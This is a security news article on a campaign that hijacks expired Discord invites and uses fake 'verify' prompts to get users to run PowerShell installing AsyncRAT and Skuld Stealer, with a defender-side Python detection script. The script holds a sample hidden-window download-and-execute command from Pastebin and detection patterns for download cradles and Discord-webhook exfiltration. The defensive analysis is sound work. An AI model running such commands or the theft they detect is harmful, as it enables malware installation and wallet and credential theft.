Skuld Stealer and AsyncRAT infect crypto wallets via fake Discord invites

16.06.2025 2 minutes Author: Newsman

Cybercriminals abuse a weakness in Discord’s invitation system to lure victims onto malicious servers. Under the guise of account verification, they trick users into manually running PowerShell commands that install the AsyncRAT malware and Skuld Stealer, an info stealer aimed at crypto wallets.

The core of the attack is hijacking expired or deleted Discord invite links that users previously considered trustworthy. Attackers re-register such links through the custom vanity URL feature and redirect victims to their own servers.

After joining the server, users are prompted to “verify” by clicking the Verify button. At this point the ClickFix mechanism is triggered: a JavaScript snippet copies a malicious PowerShell command to the clipboard and instructs the user to paste it manually into the Windows Run dialog. As a result, a script hosted on Pastebin is downloaded and executed, which in turn loads AsyncRAT and Skuld Stealer.

Skuld steals:

* seed phrases and passwords from Exodus and Atomic Wallet,

* credentials from Discord, browsers, and gaming platforms,

* cryptocurrency wallets via wallet injection: the original application files are replaced with trojanized versions fetched from GitHub.

This is not the first time Discord has been used as attack infrastructure. Through its CDN and bot systems, attackers regularly distribute malware without violating any platform policies.

In this campaign, the PowerShell payloads are hosted on public services: Bitbucket, Pastebin, and GitHub. C2 communication relies on a dead drop resolver, a technique in which the address of the control server is read from an external source (for example, a Pastebin page) rather than being hard-coded in the malware. Chrome’s credential encryption is defeated with a modified ChromeKatz utility, and the stolen data is exfiltrated via a Discord webhook.
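As an added illustration from the defender’s side (not code from the article, from the campaign, or from any vendor named in it), the following Python script applies the two detection points that the ClickFix description above and this paragraph suggest: a PowerShell process started from the Run dialog (which leaves explorer.exe as the parent) that pulls a script from a paste or code-hosting site, and a Discord webhook request issued by a script host rather than a browser. The sample events, hostnames and placeholder URLs are constructed; the tag names and severity thresholds are my own choices, not a published rule set.

```python
import re

# Constructed sample telemetry in a Sysmon-like shape (process creation and
# network events). None of these lines are taken from the described campaign.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://pastebin.com/raw/PLACEHOLDER | iex"'},
    {"id": 2, "type": "process", "parent": "code.exe", "image": "powershell.exe",
     "cmdline": "powershell -NoProfile -File C:\\build\\deploy.ps1"},
    {"id": 3, "type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell"},
    {"id": 4, "type": "network", "image": "powershell.exe",
     "url": "https://discord.com/api/webhooks/000000/PLACEHOLDER-TOKEN"},
    {"id": 5, "type": "network", "image": "chrome.exe",
     "url": "https://discord.com/channels/000000/000000"},
]

# Hosting services the article names as payload / dead-drop locations.
PASTE_SITES = ("pastebin.com", "bitbucket.org", "github.com", "githubusercontent.com")
# Common PowerShell download cradles.
CRADLE = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)
ENCODED = re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
INVOKE = re.compile(r"\biex\b|invoke-expression", re.I)
# Discord webhook endpoint; legitimate browser traffic to discord.com does not use it.
WEBHOOK = re.compile(r"https?://(?:[a-z]+\.)?discord(?:app)?\.com/api/webhooks/\d+/", re.I)
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}


def tag_process(ev):
    """Return the indicator tags that apply to one process-creation event."""
    tags = []
    cmd = ev["cmdline"]
    # A command pasted into Win+R / Run is spawned by the shell, so explorer.exe
    # is the parent. Interactive admin use looks the same, hence a weak signal alone.
    if ev["parent"].lower() == "explorer.exe":
        tags.append("launched-from-shell")
    if HIDDEN.search(cmd):
        tags.append("hidden-window")
    if ENCODED.search(cmd):
        tags.append("encoded-command")
    if CRADLE.search(cmd) and any(site in cmd.lower() for site in PASTE_SITES):
        tags.append("paste-site-download-cradle")
    if INVOKE.search(cmd):
        tags.append("invoke-expression")
    return tags


def tag_network(ev):
    """Return the indicator tags that apply to one outbound network event."""
    tags = []
    if WEBHOOK.search(ev["url"]):
        tags.append("discord-webhook")
        if ev["image"].lower() not in BROWSERS:
            tags.append("webhook-from-non-browser")
    return tags


def severity(tags):
    """Map a tag set to a severity; thresholds are illustrative choices."""
    if "paste-site-download-cradle" in tags or "webhook-from-non-browser" in tags:
        return "high"
    if len(tags) >= 2:
        return "medium"
    if tags:
        return "low"
    return "none"


def triage(events):
    """Tag and score every event; returns one result dict per input event."""
    results = []
    for ev in events:
        tags = tag_process(ev) if ev["type"] == "process" else tag_network(ev)
        results.append({"id": ev["id"], "severity": severity(tags), "tags": tags})
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(f"event {r['id']}: {r['severity']:6} {', '.join(r['tags']) or '-'}")
```

On the sample set, event 1 (shell-spawned, hidden PowerShell fetching from Pastebin and piping to `iex`) and event 4 (a webhook POST from powershell.exe) score high, the bare interactive PowerShell under explorer.exe scores low, and the build script and the browser’s ordinary Discord traffic score none. The webhook check is deliberately tied to the originating image: exfiltration over Discord looks like normal traffic at the network layer, so the process context is what makes it stand out.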

Attackers combine social engineering, multi-stage downloaders, and PowerShell scripts to bypass protections, mislead victims, and infect systems. The attack blends in with normal Discord activity, leveraging the trust users place in public invite links.
